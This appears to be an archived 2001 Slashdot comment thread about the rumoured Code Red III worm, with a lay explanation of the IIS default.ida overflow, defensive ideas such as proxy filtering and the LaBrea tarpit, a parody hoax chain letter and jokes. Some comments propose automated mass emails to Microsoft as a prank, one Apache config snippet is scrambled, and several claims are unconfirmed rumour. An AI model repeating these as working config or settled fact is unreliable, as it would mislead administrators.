Slashdot Mirror
Code Red III
drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.
How about an apache box in front of the IIS server with mod_proxy installed and setup as a reverse proxy filtering out default.ida requests??
Need Free Juniper/NetScreen Support? JuniperForum
Code Red: A New Worm
Code Red: Microsoft Strikes Back
Code Red: Return of the Virii
Code Red: The Not-so Phantom Menace
And finally...
Code Red: Attack of the Clones
LFS. Have you built your system today?
I've heard all sorts of rumours about this thing. Now whenever I hear people talk about "Code Red III", I give up asking them what it is. It doesn't exist. If it does, it is about time.
The media seems to think that Code Red 1 was July 19, Code Red 2 was Aug 1, Code Red 3 is the one with the back door. In otherwords, they're only figuring out now how bad Code Red II is.
Actually, if you add a line in your httpd.conf that looks like this:
.ida
.php .php3 .ida
AddHandler cgi-script
then you can use Perl to write a quick script which will do the reverse lookup and then send that email. Or, if you want to use PHP instead, alter your AddType line for PHP to this:
AddType application/x-httpd-php
Then restart apache, and throw a script named default.ida up to your DocumentRoot directory.
-Chris
and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and thats what needs to be addressed. There is nothing significantly fascinating about this program that deserves any noteriarty. It didn't find some weird flaw in design. It just exploits a buffer overflow which has always been a problem in peoples code. It's a really simple thing to fix at that. Enough about Code Red and more about the underlying problem.
From The Register
Best Slashdot Co
God, I'm still on version 1 of code red. Does anybody know where I can download the latest version? Is there a mail list I can get on so I know I have the lasted version on my IIS server?
Tnks.
-Nuke the moon
Get over it. Code Red is dead.
The folks here at the Fortune 500 company I work for who have been working around the clock since Wednesday trying to clean up this mess will be real happy to hear that you don't believe it exists.
Tom Liston came up with a cool idea for slowing Code Red and other TCP port scanners. He didn't have the bandwidth to host it, and I offered. So, this is a shameless plug, but if we can get enough of us doing this and get some press coverage, it's a great story that shows the power and speed with which open source solutions can be implemented. He first posted the idea on 7/31 just before Code Red started heating up again. Using the Trinux (http://www.thrinux.org) linux distribution, he cobbled together a floppy boot image that, with unused ip addresses and an old machine, can be used to slow the scans by responding to the initial TCP three way handshake and then ignoring everything else. The automated scanner has to time out before that thread can move on. According to reports on the SANS Intrusions discussion list, it seems to slow all variants of Code Red and on RPC scans as well. His announcement of LaBrea is at: http://www.incidents.org/archives/intrusions/msg01 368.html
It usually takes Microsoft 3 releases to get it right. So, when can we expect Code Red .Net?
That Linux and Apache are not compatible. :-))
We seem to have a good ways to go befoer everything that runs on Winblows will also run on Linux
The media talked about it for weeks. Ford sent out letters to customers as far as they could find them. People brought their SUVs in, got new tires put on them, drove out. That's how product recalls usually go.
Software patches aren't all that different. When a hole is discovered, a patch is made. Responsible Microsoft server administrators have the MS site automatically checked on a daily basis for critical updates and patches. Irresponsible admins don't bother, and they become vulnerable and the cause of the worm's spread.
But it would be insane to propose MS should force-feed this server patch to all their customers. The problem isn't the software, it's the admins. You'd be hard-pressed to find a major newspaper in the civilized world that hasn't mentioned this worm yet, and still there are people who don't bother to patch. They're the same ones who think that server software is just like desktop software, where you're the only one who uses it that really matters.
Firestone couldn't make its customers bring their SUVs in to have the tires replaced for free, and there's no way the customers could claim ignorance of the problem after the press got done with it. Likewise, Microsoft can't make its customers upgrade their software for free. They've honestly tried to make all their server customers aware of what's expected of them, but they're as powerless to force it to happen as Firestone is to force car drivers to rotate their tires every 6,000 miles.
My suspicion is this is Code Red 2. One of the AV companies used "CodeRed.v3" or something similar to refer to Code Red 2, and I'd bet the journalists were just too clueless to figure out that the two names refer to the same thing.
More popular with whom? If there's anything these worms have shown us, it's that there's a HELL of a lot more IIS installations then anybody would really have guessed, due to the ease of installing it without even realizing it with Windows 2000.
IIS and Apache may be roughly comparable for "real" websites, but in terms of sheer number of installations, I'd now bet that IIS is creaming apache.
Before you get too huffy, note this is a bad thing, as it has provided a fertile breeding ground for these worms, while providing little-to-no benefit in return.
"More lusers with vulnerable web servers then ever before - Microsoft Windows 2000."
Hi,
I've been watching my Apache log as I get hit about every 10 minutes by Code Red. For each source IP address I've been doing a reverse lookup and if successful then notifying the webmaster of the source domain about the infected computer on their network.
I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.
An example of the email I've been sending is this:
Hi,
Just a note to let you know that a copy of the Code Red virus is on your network attacking my web server. The source IP address is: 207.151.xxx.xxx which a reverse lookup shows as xxx.xxx.gdsl.nwc.net . If this is a customer on your network then please pass on to that individual that they need to reboot their NT/W2K server and possibly reinstall their OS. They will also need to get a patch from Microsoft to correct this vulnerability.
This is probably a very miniscule thing to do, but it does - in a way - inoculate against the virus, at least on consumer DSL networks, and in a manner that is both ethical and - like a virus - fairly contagious. I've heard a lot of buzz in places like Slashdot about making an "anti-virus" but why haven't I heard this kind of thing suggested before?
-- thinkyhead software and media
Here we have something that does not come with source code, but people are still able to maintain the program, improve its performance, and then get those improvements quickly out into the field. Even Linux updates don't get distributed this efficiently.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
but I have not seen any instances of attempted infection.
It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.
I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.
$5 / month hosted VPS on linux = awesome!
I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log
should we set up a site somewhere of ip addrs?
Already got one! Remember, the list, including fully-qualified hostnames, is for _educational_ purposes only. I've made it available so that we can study how this thing moves, not for such purposes as mass-spamming postmaster@$IIS-INFECTED-HOSTNAME with flames reminding him that he is a bliterhing idiot, nor for other untoward activities which may be performed on a machine with a shell in a webserver's public directory.
Fire and Meat. Yummy.
If Microsoft can't even patch their own servers then how can anyone expect others to do it properly? The best solution (in the long run), is to switch to a server which has less vulnerabilities.
Developers: We can use your help.
I know gun manufacturers shouldn't be sued when someone commits a crime with a firearm, and in that case the people who created the lame Code Red virii should be sued primarily, but I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth like crazy simply because the OS vendor doesn't give a damn about these things.
To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected. Therefore, at the very least, I reckon they should be ordered to pay damages to telcos and ISPs for lack of due diligence.
(of course, in Georgia, I'd also be happy to see the state sue them for 59c per second of wasted bandwidth as well :-)
"A door is what a dog is perpetually on the wrong side of" - Ogden Nash
Sequels that are actually better than the original.
Don't trust a bull's horn, a doberman's tooth, a runaway horse or me.
and see that they go where they belong. I mean seriously, I've seen lot's of sites with a domain name which I thought was some other much more popular site which had a small link at the bottom saying something to the affect of: If you're looking for such and such they're actually located here.
It's just common courtesy provided it isn't a competitors site.
So what you do is set up a script to pull each individual Code Red transaction out of your logs and send an email to support@microsoft.com with a message similar to the following:
A user at IP address x.x.x.x was trying to contact you and got my IP address by mistake. I know how important the needs and desires of your customers are to Microsoft, so I was certain you would want to know about this as soon as possible.
What happens is that IIS sits there, waiting for Web browsers to request pages. A Code Red infected server starts randomly picking other computers on the Internet or the network, and requests them to send a Web page called default.ida. It then passes a huge parameter to default.ida.
Apparently, default.ida has hard-coded a maximum length for parameters -- say, 200 letters. (Probably not actually 200 -- but you get the idea.) That's what all the XXX and NNN's are there -- it's the 200 (etc.) letters that's the most default.ida is expecting to receive. A buffer overflow is when something goes past that maximum number of letters, and a program with a buffer overflow problem usually does something strange with the information past that point -- in this case, default.ida takes everthing after that number of letters and runs it like it were a program.
Normally, this would just crash IIS (since it's getting a bunch of garbage, and running garbage makes programs crash) but Code Red is purposely designed so after the right number (200 or whatever) of XXX/NNN's, it tacks on the code to infect the computer with Code Red. So, IIS runs the code, the computer becomes infected with Code Red, it starts trying to spread it to other computers, and the whole cycle starts all over again.
You might be interested in this article titled, "Securing an unpatchable webserver"
Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
If you see a message on the boards with a subject line of "Hi, how are you," delete it immediately WITHOUT reading it. It is "Code Red III". This is the most dangerous virus yet. It will re-write your hard drive. Not only that, but it will scramble any disks that are even close to your computer (up to 20 feet). It will recalibrate your refrigerator's coolness setting so all your ice cream melts and milk curdles. It will demagnetize the strips on all your credit cards, reprogram your ATM access code,screw up the tracking on your VCR and use subspace fieldharmonic to scratch any CDs you try to play.
It will give your ex-boy/girlfriend your new phone number. It will program your phone autodial to call only your mother's number. It is insidious and subtle. It is dangerous and terrifying to behold. It will mix antifreeze into your fish tank. It will drink all your beer.It will hide your car keys when you are late for work and interfere with your car radio so that you hear 1940's hits and static while stuck in traffic.
It will give you nightmares about circus midgets. It will replace your shampoo with Nair and your Nair with Rogaine, all while dating your current boy/girlfriend behind your back and billing their hotel rendezvous to your Visa card. It will seduce your grandmother. It does not matter if she is dead, such is the power of "Code Red III", it reaches out beyond the grave to sully those things we hold most dear.
It will rewrite your back-up files, changing all your active verbs to passive tense and incorporating undetectable misspellings which grossly change the interpretation of key sentences.
"Code Red III" will give you Dutch Elm disease. It will leave the toilet seat up and leave the hairdryer plugged in dangerously close to a full bathtub. It will wantonly remove the forbidden tags from your mattresses and pillows,and refill your skim milk with whole. "Code Red III" is an evil virus conceived by evil people. It is also a rather interesting shade of mauve. These are just a few signs. Be very, very afraid. PLEASE FORWARD THIS MESSAGE TO EVERYONE YOU KNOW!!!
"Love is never saying you're too proud." -Tonic
I'm not even sure how to spell regexe, but this is what I've attempted to do:
So, Three Code Reds and a SirCam later, the question just begs to be asked:
Who's calling Whose code "Potentially Viral"?
So there I was, juggling apples and small animals, when I accidentally bit into the wrong one...
According to Symantec's page on CR2:
Also Known As: CodeRed.v3, CodeRed.C, CodeRed III, W32.Bady.C